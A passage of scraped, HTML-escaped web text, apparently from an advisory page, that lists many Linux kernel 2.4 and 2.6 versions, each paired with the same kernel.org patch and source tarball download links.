-git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.25.3\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.23.14\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.11.4\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.20-rc2\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.22-rc1\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.20-2\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.20.3\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.25.2\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.23.09\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.15-27.48\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.24-rc1\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.4 .0-test3\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4 .0-test11\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4 .0-test9\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.10 \r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.11 \r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.12 \r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.18 pre-2\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.18 pre-5\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.18 pre-1\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.19 -pre4\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.19 -pre3\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.21 \r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.21 pre7\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.23 -pre9\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.26 \r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.27 -pre2\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.27 -pre4\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.29 -rc2\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.30 rc3\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.31 -pre1\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.32 -pre2\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.32 -pre1\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.33 -pre1\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.33 .7\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.36 5\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.4.36 1\r\n\r\nLinux patch-2.4.36.6.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.36.6.bz2</a>\r\n\r\n\r\nLinux kernel 2.6 -test4\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6 -test9\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6 -test10\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.1 \r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.10 rc2\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.11 -rc3\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.11 .11\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.11 .7\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.12 .1\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.12 -rc4\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.12 .22\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.12 .2\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.13 \r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.14 .1\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.15 \r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.15 \r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.15 -rc3\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.15 \r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.16 .9\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.16 .1\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.17 .13\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.17 .10\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.17 -rc5\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.19 -rc2\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.19 \r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.20 \r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.21 \r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a 